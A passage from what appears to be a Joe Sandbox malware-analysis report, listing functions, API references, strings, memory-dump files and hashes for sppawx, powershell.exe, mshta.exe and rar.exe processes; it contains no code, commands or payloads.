Associated: 00000002.00000002.1751596856.00007FFEDCCB7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedcbf0000_sppawx.jbxd

Similarity

API ID:
String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
API String ID: 0-402823876
Opcode ID: 3e6586d1590c5e37fe5a7cb55c6f6f0f2fce94f93ce1c7229bf9571863312e5a
Instruction ID: 04823874bff97c0bbb29aae3ada4ebf782f2730f1cb1bf18b5838384d5e7b0e4
Opcode Fuzzy Hash: 3e6586d1590c5e37fe5a7cb55c6f6f0f2fce94f93ce1c7229bf9571863312e5a
Instruction Fuzzy Hash: 65419F25A9964282EB45AB69D4517BD2291FF88BC4F8C4037DA4C46BF6EF3CE142C702

Function 00007FF79A32F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF79A32F668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF79A32F6BA

Strings

:, xrefs: 00007FF79A32F67E

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 4a9b1d6d16ab1fe6c903793d19c8bb2ed63e5c59599aead2cadc4c72b8df4769
Instruction ID: 4e1fd81dc36432723768758053b2140e424b0c93bad1eb94ad0a12165e789b89
Opcode Fuzzy Hash: 4a9b1d6d16ab1fe6c903793d19c8bb2ed63e5c59599aead2cadc4c72b8df4769
Instruction Fuzzy Hash: EB21E163A0928182FB70AB31D04826DF3B1FB88B48FD5807DDA8D43694DF7CE9558B60

Function 00007FF79A31FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF79A31FE08
RaiseException.KERNEL32 ref: 00007FF79A31FE49

Strings

csm, xrefs: 00007FF79A31FE36

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: b840087720e8b2518e63abfa82fb4efe4917aad8864f4536ad74be85905c2eba
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: 44115B32A09B8182EB20DF25F400269B7E0FB88B84F984279EE8D07769DF3CD551CB10

Function 00007FF79A3307AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3307DC
GetDriveTypeW.KERNEL32 ref: 00007FF79A33081C

Strings

:, xrefs: 00007FF79A330805

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 661e98d332bd1102e4b862f825f9ff25bf39f272a3d811e7275bb2396d4bd79c
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: 2D017C22E1E20296F730BF70946627EB3A0EF85708FC0107EE95D86695DE2CE544CA24

Function 00007FFEDD27802C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

if_nametoindex.IPHLPAPI ref: 00007FFEDD278062

Strings

O&:if_nametoindex, xrefs: 00007FFEDD27803F
no interface with this name, xrefs: 00007FFEDD27808B

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: if_nametoindex
String ID: O&:if_nametoindex$no interface with this name
API String ID: 3183282855-3835682882
Opcode ID: 98493591a659af0213437e765703a3a556d57d58ca33cb4998051ffa7530dfdf
Instruction ID: bd6cc63eb2fd8f5552009a8b7d866f645b2fbe6345b7887f7751c07233d3ec7f
Opcode Fuzzy Hash: 98493591a659af0213437e765703a3a556d57d58ca33cb4998051ffa7530dfdf
Instruction Fuzzy Hash: 34011E75B08B43A5EB309F65E89417D63A0BFC8B69F580433D64E46A74EE3DE544C704

Function 00007FFEDD277AF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

getprotobyname.WS2_32 ref: 00007FFEDD277B29

Strings

s:getprotobyname, xrefs: 00007FFEDD277AFC
protocol not found, xrefs: 00007FFEDD277B4C

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: getprotobyname
String ID: protocol not found$s:getprotobyname
API String ID: 402843736-630402058
Opcode ID: 2f70ce79659ed13e4342e0d9fb3f69ee9e36e101a059a86bd66953f75dec2b1e
Instruction ID: 5ffc8869645fb6d2e62a794856b1dfb41c676ab0aea4a2079fc1e4f178803b02
Opcode Fuzzy Hash: 2f70ce79659ed13e4342e0d9fb3f69ee9e36e101a059a86bd66953f75dec2b1e
Instruction Fuzzy Hash: E501DA25A18B42E2DA349B22E95417D6361FBC9FA1F581432DA4E87F74FF2CE458C700

Function 00007FFEDD278134 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

inet_ntoa.WS2_32 ref: 00007FFEDD278198

Strings

packed IP wrong length for inet_ntoa, xrefs: 00007FFEDD278160
y*:inet_ntoa, xrefs: 00007FFEDD278140

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: inet_ntoa
String ID: packed IP wrong length for inet_ntoa$y*:inet_ntoa
API String ID: 1879540557-3027498899
Opcode ID: 4b7a4f3c29876b6bee92d7c7859f4f750ad6f09b5005b8fdf6fed3d553e13eda
Instruction ID: 70e588b610913337c01c2275e88fdd9ed57b02ede76b3a48dd85a9b1b134d4d3
Opcode Fuzzy Hash: 4b7a4f3c29876b6bee92d7c7859f4f750ad6f09b5005b8fdf6fed3d553e13eda
Instruction Fuzzy Hash: C301EC31B08B47A2EA309B25E8540AD6360FBC8B65F580137DA4E47A74EF3CE549CB11

Analysis Process: powershell.exePID: 8072, Parent PID: 7932COMMON

Executed Functions

Function 00007FFE7B24E97F Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1434823807.00007FFE7B24D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7B24D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7b24d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
Instruction ID: 4d9ffcedfb11d855366a1dfcb34dc869b8c70461350bff405abc2c8a3ea52123
Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
Instruction Fuzzy Hash: 92014F3251CE08CF9AA8EF1EE48595237E0FB98320710065AD41DC766AD731F892CBC1

Function 00007FFE7B3633B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1435489773.00007FFE7B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7B360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7b360000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bd09870f5ed876a56b22500aa4c3edc213cd72116ad46ecf824c3a61b1edc92
Instruction ID: 23cad6a64da3e88e44b483a055d370bb9c7b90350e142d421611c5f6aeee8d31
Opcode Fuzzy Hash: 5bd09870f5ed876a56b22500aa4c3edc213cd72116ad46ecf824c3a61b1edc92
Instruction Fuzzy Hash: AC01677121CB0C4FD744EF0CE451AB5B7E0FB95364F10056EE59AC36A5DA36E882CB45

Function 00007FFE7B4345CF Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1436319253.00007FFE7B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7B430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7b430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e562ec9c8e582cba69c3990def1cbe30a1c42cd7d32edbcdde15974253f1f6ab
Instruction ID: 6e4f88834080ba1550375979f1085ad115ab56121588566de3a480047d7ebf8e
Opcode Fuzzy Hash: e562ec9c8e582cba69c3990def1cbe30a1c42cd7d32edbcdde15974253f1f6ab
Instruction Fuzzy Hash: 45F0813290D1854FD761EB2C98555E87BE0EF41324B1900FAD1A9DB07BEA2AAC94C741

Function 00007FFE7B434326 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1436319253.00007FFE7B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7B430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7b430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 585c14e1f96a6d39e336d62aee2d1c9d656b0fbe0a83fb1bf59339c45b1959fd
Instruction ID: f642ef66cb45c381465faf36da2786a1cee73ecd4fdb932555a1001b69f7c900
Opcode Fuzzy Hash: 585c14e1f96a6d39e336d62aee2d1c9d656b0fbe0a83fb1bf59339c45b1959fd
Instruction Fuzzy Hash: 87F0AF32A0C6868FE7A5EB1CA8414E877E0FF85324B1900FAD05DDB077EA2AAC45C741

Function 00007FFE7B436A49 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1436319253.00007FFE7B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7B430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7b430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebdd1cb3c47917e0c8a7e465132b9531f06c37dcdc63a5a1a530d1f9fd3cf94c
Instruction ID: 4c810ca157f473a62002cda414f00afcb7886f049c56fa4ef1268f6680a62de1
Opcode Fuzzy Hash: ebdd1cb3c47917e0c8a7e465132b9531f06c37dcdc63a5a1a530d1f9fd3cf94c
Instruction Fuzzy Hash: 60F0ED32E0EB884FEB11EBA894445FCBBA0EF99720F1804BFD04DDA9A3D9290841C311

Non-executed Functions

Function 00007FFE7B368BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

O_^J, xrefs: 00007FFE7B368C7A
O_^I, xrefs: 00007FFE7B368C72
O_^F, xrefs: 00007FFE7B368C6A
O_^6, xrefs: 00007FFE7B368BFA
O_^<, xrefs: 00007FFE7B368C2A

Memory Dump Source

Source File: 0000000B.00000002.1435489773.00007FFE7B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7B360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7b360000_powershell.jbxd

Similarity

API ID:
String ID: O_^6$O_^<$O_^F$O_^I$O_^J
API String ID: 0-2439779554
Opcode ID: ac180d0de7f6185abe8c3b5825832dd7e869bd7e30952a151ae460ba1a09475f
Instruction ID: b278b55a5e67e9674ab2bf2f437d70041f6b86d57f4c88451c5ea287fc2a6ecb
Opcode Fuzzy Hash: ac180d0de7f6185abe8c3b5825832dd7e869bd7e30952a151ae460ba1a09475f
Instruction Fuzzy Hash: 372132BF3194169EE20277AEB80A7DC7380EBD567734C01B3E25ECFA13D914648B8690

Function 00007FFE7B3689B1 Relevance: 5.1, Strings: 4, Instructions: 115COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFE7B3689C9
O_^, xrefs: 00007FFE7B368A7A
O_^, xrefs: 00007FFE7B368AC2
O_^, xrefs: 00007FFE7B368A2A

Memory Dump Source

Source File: 0000000B.00000002.1435489773.00007FFE7B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7B360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7b360000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^
API String ID: 0-934926442
Opcode ID: 88df611da3a5fcf82004dce85af9a89647c19f96c2e1bdae79cea576b63877a1
Instruction ID: 7c94deac07034b279dee072004665fd9eb93014cc2ad08477fb326f91a2d8ed5
Opcode Fuzzy Hash: 88df611da3a5fcf82004dce85af9a89647c19f96c2e1bdae79cea576b63877a1
Instruction Fuzzy Hash: CA41D6B792D5C3ABF656421D889D0657BA4FF6532CB1802F7C8A98F0BFED8928874101

Analysis Process: mshta.exePID: 8124, Parent PID: 7948COMMON

Executed Functions

Function 0000020DD5980FBA Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000003.1375982325.0000020DD5980000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020DD5980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_20dd5980000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ba2e1a521016d2c7164f7fe7f35988dec8f75605b5d913d5f5949e93377af2a
Instruction ID: 4ab4bfea3aa5805afdce446a72c6cbc2c4683e087183f88209dbfbbb07664a50
Opcode Fuzzy Hash: 5ba2e1a521016d2c7164f7fe7f35988dec8f75605b5d913d5f5949e93377af2a
Instruction Fuzzy Hash: 45B0120005F7C28ED70353B20C7A15D2F705E47104FCD49C28455D5097D00C0A8A5362

Analysis Process: powershell.exePID: 7596, Parent PID: 4384COMMON

Executed Functions

Function 00007FFE7CAA4EA5 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.1608243950.00007FFE7CAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ffe7caa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16f7529632cfd0de823a417871a56d80ab5f5e45c3962fb9af36fcd1e67057fe
Instruction ID: 32853ff75460e566f3ebe545eb36efd6557c6005a88a5e24c802eca4a55e46c7
Opcode Fuzzy Hash: 16f7529632cfd0de823a417871a56d80ab5f5e45c3962fb9af36fcd1e67057fe
Instruction Fuzzy Hash: 42414031E19A098FDB48EF6CD4855ACB7F1FF49315B14916DE41AE72A2CB35A843CB40

Function 00007FFE7CAA4E0A Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.1608243950.00007FFE7CAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ffe7caa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b24b0a7360fbd5ba294acfa00ecd65d410ae3fb170a41e875f41e0f8d2286f79
Instruction ID: 215f47e566790129c6857447c1a64ced778e80b66a015ef887984b0fab143360
Opcode Fuzzy Hash: b24b0a7360fbd5ba294acfa00ecd65d410ae3fb170a41e875f41e0f8d2286f79
Instruction Fuzzy Hash: 6D111B36A58A1C8FDB54DE5CD4442ECBBB1FB58325F64916ED10AE7245CB32A8838B40

Function 00007FFE7CB70AA4 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.1608914708.00007FFE7CB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ffe7cb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20cd0a3fbff5b353ad751b912d128480b31da4ac92174ebc9c294c21e8af1259
Instruction ID: 048e313547331950af53b47835cb389ec9898c52e120a2594ed711e7b5577377
Opcode Fuzzy Hash: 20cd0a3fbff5b353ad751b912d128480b31da4ac92174ebc9c294c21e8af1259
Instruction Fuzzy Hash: C3F08C33B5CA290EEBA1965C78053F9B3D4EB88275F141677D85ED2280EA18D95642C0

Function 00007FFE7CAA3945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.1608243950.00007FFE7CAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ffe7caa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d11efe61099d1eba348eee0083181da05b68936cc147a5a07aaa732069b81fbe
Instruction ID: 8f2c97f12c1e392078e34338f743ad47a0de0c2b483c523eb3fde652ffee576d
Opcode Fuzzy Hash: d11efe61099d1eba348eee0083181da05b68936cc147a5a07aaa732069b81fbe
Instruction Fuzzy Hash: 0301677115CB0C4FD748EF0CE451AA9B7E0FB95364F10056EE58AC3661DB36E891CB45

Function 00007FFE7CAA4E2E Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.1608243950.00007FFE7CAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ffe7caa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92bd6bec9ca79f23ebdd80e59461fbd4104f4af28d19a33d733678829ee65af0
Instruction ID: 75bed536b82b64f5e4b2caa9a741d29dd5acbf0888ecf96b1b5a2d71ab87143e
Opcode Fuzzy Hash: 92bd6bec9ca79f23ebdd80e59461fbd4104f4af28d19a33d733678829ee65af0
Instruction Fuzzy Hash: BF014431A4891D8FDB84EB68D4543ACBBF1EB48365F2881ADC50EE7755CA799C43CB40

Function 00007FFE7CB70AC0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.1608914708.00007FFE7CB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ffe7cb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4bbc8d5003f6fa30b00c8c50f101bb1171fc128ea244681259cf3d56c3d9a8a
Instruction ID: e1b3fd86bdb6c73a711818bb53f48d58cba46894777c5b52875e993d2af63f77
Opcode Fuzzy Hash: c4bbc8d5003f6fa30b00c8c50f101bb1171fc128ea244681259cf3d56c3d9a8a
Instruction Fuzzy Hash: 69F0E223EAE9AA0AFBA1E55C3C151B862D4EF54375F1D05BBE92DC20F3DC086C850381

Function 00007FFE7CB718E8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.1608914708.00007FFE7CB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ffe7cb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec69875a90de280fb3ded6ee46840f9078668d21b45ead149f80b31edf53ccc5
Instruction ID: bae1e612a0502e7dec317b5d7f058f3218c3eff1060d1714714d17fd83a9dc39
Opcode Fuzzy Hash: ec69875a90de280fb3ded6ee46840f9078668d21b45ead149f80b31edf53ccc5
Instruction Fuzzy Hash: 53F08233F9C9194FE358AA4CA4810BCB3E6EF95221B58047BE51EC3563DE25A8968240

Function 00007FFE7CB71B6E Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.1608914708.00007FFE7CB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ffe7cb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 970eed2341acf4564ab1bd0ed12fa49544bb7178324dbca70b111dedd0d346d7
Instruction ID: 23d7b5c2e3d7b6aed1124e50f48760586514f0da9ed5c6653a574a548e952284
Opcode Fuzzy Hash: 970eed2341acf4564ab1bd0ed12fa49544bb7178324dbca70b111dedd0d346d7
Instruction Fuzzy Hash: 77F0A733E9C5198FD7589A8C94814BCB3E6EF45210B580477E51DC3573EA25A8418250

Analysis Process: rar.exePID: 7036, Parent PID: 7212COMMON

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	1193
Total number of Limit Nodes:	37

Executed Functions

Function 00007FF6256C54C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON

Download Yara Rule

Strings

7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx, xrefs: 00007FF6256C5935
default.sfx, xrefs: 00007FF6256C60F4
ERR, xrefs: 00007FF6256C5D40
EML, xrefs: 00007FF6256C5D6B
stdin, xrefs: 00007FF6256C672D
LOG, xrefs: 00007FF6256C5CD0
stdin, xrefs: 00007FF6256C6236
rar.log, xrefs: 00007FF6256C5CE5
*.%ls, xrefs: 00007FF6256C59AF
NUL, xrefs: 00007FF6256C5DB3
SFX, xrefs: 00007FF6256C60CC
OFF, xrefs: 00007FF6256C5E4B
VER, xrefs: 00007FF6256C5EBA
+, xrefs: 00007FF6256C6535
*?., xrefs: 00007FF6256C598C
SND, xrefs: 00007FF6256C5D11

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID:
String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
API String ID: 0-1628410872
Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction ID: 0e36fae1093347e29362ec549562b1be71e94bd071507bd62a5f3e829fb15dcd
Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction Fuzzy Hash: F7C2B372D0C1D281EE749F288D4C1BD26A1BB11F86F588135CA0ECA2E5DF6DED44E35A

Function 00007FF6256B1884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON

Download Yara Rule

Strings

sfx, xrefs: 00007FF6256B1884
q:, xrefs: 00007FF6256B19DA
.ext, xrefs: 00007FF6256B18C0
%s%s , xrefs: 00007FF6256B2A46
rar, xrefs: 00007FF6256B18AA
,6, xrefs: 00007FF6256B2F83
exe, xrefs: 00007FF6256B1897
BK, xrefs: 00007FF6256B19C5

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
